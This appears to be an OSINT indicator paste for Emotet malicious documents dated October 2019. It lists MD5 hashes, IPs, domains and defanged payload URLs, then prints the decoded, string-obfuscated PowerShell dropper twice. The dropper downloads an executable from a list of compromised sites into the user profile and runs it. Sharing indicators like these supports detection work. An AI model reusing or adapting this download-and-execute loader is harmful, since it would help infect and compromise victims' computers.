Emotet_Doc_out_2019-10-09_22_14.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. MD5:
4. 04469ecb3f765955f82a93379acc2524
5. 11c36b543e3e97c6680d435c320d4d67
6. 21d208257e8f31ee15a3932667c68cd4
7. 375846b79a13f123c26bdb86946cc64a
8. 42341718bf29a12779f32a0acf7d7bcd
9. e5666d50036a170e531cc66bf36d277c
10. 65742f9577704d7c979591348b733263
11. 8a19585d708831afe179fabd1bc08bad
12. 4f3063fbabd26cb3438a4a8c9c85a87c
13. 8c4586bda7ad1334e13f34da54bc93a5
14. cfb022a24ff5f5e53b3ca65af95cb955
15. d106bdf1e942b1a93c30cc1bd1b05fcb
16. e1d2e9184df6b6a9ca2a86b611e082cc
17. f1212f1494b917465cf53d42447b17b5
18.  
19.  
20. IPs:
21. 101.50.1.27
22. 139.162.43.93
23. 146.88.234.116
24. 160.153.131.188
25. 160.153.72.33
26. 166.62.103.202
27. 176.58.102.35
28. 35.238.93.185
29. 43.255.154.26
30. 45.56.101.4
31.  
32.  
33. Domains:
34. boomenergyng.com
35. e-centricity.com
36. flowerbodysports.com
37. flyadriatic.co.nz
38. newagesl.com
39. stephporn.com
40. thehopeherbal.com
41. www.bundlesbyb.com
42. www.crookedchristicraddick.com
43. www.westburydentalcare.com
44.  
45.  
46. URLs:
47. hxxps://www.microsoft.com/ #> $b000532c400=
48. hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
49. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
50. hxxps://e-centricity.com/css/zcnIdWUhbd/
51. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
52. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/
53. hxxps://www.microsoft.com/ #> $b000532c400=
54. hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
55. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
56. hxxps://e-centricity.com/css/zcnIdWUhbd/
57. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
58. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/
59.  
60.  
61. Decoded Base64 Powershell:
62. <# hxxps://www.microsoft.com/ #> $b000532c400='b004494x456';
63. $c2574c24817 = '178';
64. $b7b47x300671c='b4703845100';
65. $c8168c84395=$env:userprofile+'\'+$c2574c24817+'.exe';
66. $x3273486252='c030c7500x029';
67. $c69c008420c=&('new-ob'+'je'+'ct') nEt.wEBCLIenT;
68. $b0504bcc6bc08='hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
69. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
70. hxxps://e-centricity.com/css/zcnIdWUhbd/
71. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
72. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/'."s`PlIT"('
73. ');
74. $x0780x962x0='b1032704c48';
75. foreach($cbc7139x96b in $b0504bcc6bc08){try{$c69c008420c."dOW`NLo`AdFi`Le"($cbc7139x96b, $c8168c84395);
76. $xc2338c44407='c5b020147b70b';
77. If ((&('G'+'e'+'t-Item') $c8168c84395)."leN`g`TH" -ge 26538) {[Diagnostics.Process]::"Sta`Rt"($c8168c84395);
78. $b03397108170c='c7000b74640';
79. break;
80. $c3606400230='xbb22200041'}}catch{}}$c06000x0c3903='x610780522b80'<# hxxps://www.microsoft.com/ #> $b000532c400='b004494x456';
81. $c2574c24817 = '178';
82. $b7b47x300671c='b4703845100';
83. $c8168c84395=$env:userprofile+'\'+$c2574c24817+'.exe';
84. $x3273486252='c030c7500x029';
85. $c69c008420c=&('new-ob'+'je'+'ct') nEt.wEBCLIenT;
86. $b0504bcc6bc08='hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
87. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
88. hxxps://e-centricity.com/css/zcnIdWUhbd/
89. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
90. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/'."s`PlIT"('
91. ');
92. $x0780x962x0='b1032704c48';
93. foreach($cbc7139x96b in $b0504bcc6bc08){try{$c69c008420c."dOW`NLo`AdFi`Le"($cbc7139x96b, $c8168c84395);
94. $xc2338c44407='c5b020147b70b';
95. If ((&('G'+'e'+'t-Item') $c8168c84395)."leN`g`TH" -ge 26538) {[Diagnostics.Process]::"Sta`Rt"($c8168c84395);
96. $b03397108170c='c7000b74640';
97. break;
98. $c3606400230='xbb22200041'}}catch{}}$c06000x0c3903='x610780522b80'